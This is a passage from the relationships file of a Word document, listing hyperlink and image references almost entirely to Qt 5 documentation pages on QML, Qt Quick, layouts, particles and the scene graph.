Id="rId1180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-playvariation.html" TargetMode="External"/><Relationship Id="rId2024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickrendercontrol.html" TargetMode="External"/><Relationship Id="rId2231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-focus.html" TargetMode="External"/><Relationship Id="rId2469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId2676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId2883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-container.html" TargetMode="External"/><Relationship Id="rId1040" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layoutmirroring.html" TargetMode="External"/><Relationship Id="rId1278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId1485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId2329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/edge2.png" TargetMode="External"/><Relationship Id="rId2536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId2743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-internationalization.html" TargetMode="External"/><Relationship Id="rId715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-alphatest.html" TargetMode="External"/><Relationship Id="rId922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-filedialogrequest.html" TargetMode="External"/><Relationship Id="rId1138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentanimation.html" TargetMode="External"/><Relationship Id="rId1345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-symbolmodekey.html" TargetMode="External"/><Relationship Id="rId1552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgopaquetexturematerial.html" TargetMode="External"/><Relationship Id="rId2603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId1205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-qabstracttransition.html" TargetMode="External"/><Relationship Id="rId1857" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-imageparticle.html" TargetMode="External"/><Relationship Id="rId2810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem-itemchangedata.html" TargetMode="External"/><Relationship Id="rId2908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-resources.html" TargetMode="External"/><Relationship Id="rId1412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-tumbler.html" TargetMode="External"/><Relationship Id="rId1717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visual-parent-example2.png" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-topic.html" TargetMode="External"/><Relationship Id="rId2186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId2393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId2698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-deployment.html" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2046" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId2460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rotationanimation.html" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-delaybuttonstyle.html" TargetMode="External"/><Relationship Id="rId1062" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-magnetometerreading.html" TargetMode="External"/><Relationship Id="rId2113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations-d3d12.html" TargetMode="External"/><Relationship Id="rId2320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId2972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-index.html" TargetMode="External"/><Relationship Id="rId737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-attractor.html" TargetMode="External"/><Relationship Id="rId944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-frontface.html" TargetMode="External"/><Relationship Id="rId1367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-textfield.html" TargetMode="External"/><Relationship Id="rId1574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-topic.html" TargetMode="External"/><Relationship Id="rId1781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId2418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertychanges.html" TargetMode="External"/><Relationship Id="rId2625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-dynamicobjectcreation.html" TargetMode="External"/><Relationship Id="rId804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3drenderbuffer.html" TargetMode="External"/><Relationship Id="rId1227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-rectangularglow.html" TargetMode="External"/><Relationship Id="rId1434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-viewtransition.html" TargetMode="External"/><Relationship Id="rId1641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId1501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/resources.html" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-gammaadjust.html" TargetMode="External"/><Relationship Id="rId2068" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtexture.html" TargetMode="External"/><Relationship Id="rId2275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keys.html" TargetMode="External"/><Relationship Id="rId3021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keys.html" TargetMode="External"/><Relationship Id="rId899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-double.html" TargetMode="External"/><Relationship Id="rId1084" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-menu.html" TargetMode="External"/><Relationship Id="rId2482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId2787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/09-qdoc-commands-includingimages.html" TargetMode="External"/><Relationship Id="rId661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-dynamicobjectcreation.html" TargetMode="External"/><Relationship Id="rId759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-blendequation.html" TargetMode="External"/><Relationship Id="rId966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridmesh.html" TargetMode="External"/><Relationship Id="rId1291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-sliderstyle.html" TargetMode="External"/><Relationship Id="rId1389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-toolbutton.html" TargetMode="External"/><Relationship Id="rId1596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-codesamples.html" TargetMode="External"/><Relationship Id="rId2135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgflatcolormaterial.html" TargetMode="External"/><Relationship Id="rId2342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtpositioning-index.html" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/10-qdoc-commands-tablesandlists.html" TargetMode="External"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstring.html" TargetMode="External"/><Relationship Id="rId1151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathinterpolator.html" TargetMode="External"/><Relationship Id="rId1249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-routemodel.html" TargetMode="External"/><Relationship Id="rId2202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-mouseevents.html" TargetMode="External"/><Relationship Id="rId2854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-clearbuffers.html" TargetMode="External"/><Relationship Id="rId1011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-itemmodelscatterdataproxy.html" TargetMode="External"/><Relationship Id="rId1109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtnfc-ndefmimerecord.html" TargetMode="External"/><Relationship Id="rId1456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginenavigationrequest.html" TargetMode="External"/><Relationship Id="rId1663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-imageparticle.html" TargetMode="External"/><Relationship Id="rId1968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html" TargetMode="External"/><Relationship Id="rId2507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentchange.html" TargetMode="External"/><Relationship Id="rId2714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-standardpaths.html" TargetMode="External"/><Relationship Id="rId1523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-instantiator.html" TargetMode="External"/><Relationship Id="rId1730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-topic.html" TargetMode="External"/><Relationship Id="rId2297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-index.html" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtmultimedia-index.html" TargetMode="External"/><Relationship Id="rId683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/technical-guide.html" TargetMode="External"/><Relationship Id="rId890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-diffusespecularmapmaterial.html" TargetMode="External"/><Relationship Id="rId2157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-point.html" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-hxymodelmapper.html" TargetMode="External"/><Relationship Id="rId1173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-placeattribute.html" TargetMode="External"/><Relationship Id="rId1380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-tiltreading.html" TargetMode="External"/><Relationship Id="rId2017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-dynamicobjectcreation.html" TargetMode="External"/><Relationship Id="rId2876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-barcategoryaxis.html" TargetMode="External"/><Relationship Id="rId848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-computecommand.html" TargetMode="External"/><Relationship Id="rId1033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-styles-keypanel.html" TargetMode="External"/><Relationship Id="rId1478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-yanimator.html" TargetMode="External"/><Relationship Id="rId1685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-visualparent.html" TargetMode="External"/><Relationship Id="rId2431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-list.html" TargetMode="External"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-glow.html" TargetMode="External"/><Relationship Id="rId708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-action.html" TargetMode="External"/><Relationship Id="rId915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-core-entityloader.html" TargetMode="External"/><Relationship Id="rId1240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-reviewmodel.html" TargetMode="External"/><Relationship Id="rId1338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-surfacedataproxy.html" TargetMode="External"/><Relationship Id="rId1545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId2943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-calendar-monthgrid.html" TargetMode="External"/><Relationship Id="rId1405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-transform.html" TargetMode="External"/><Relationship Id="rId1752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qgridlayout.html" TargetMode="External"/><Relationship Id="rId2803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-imports.html" TargetMode="External"/><Relationship Id="rId1612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId2081" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2386" 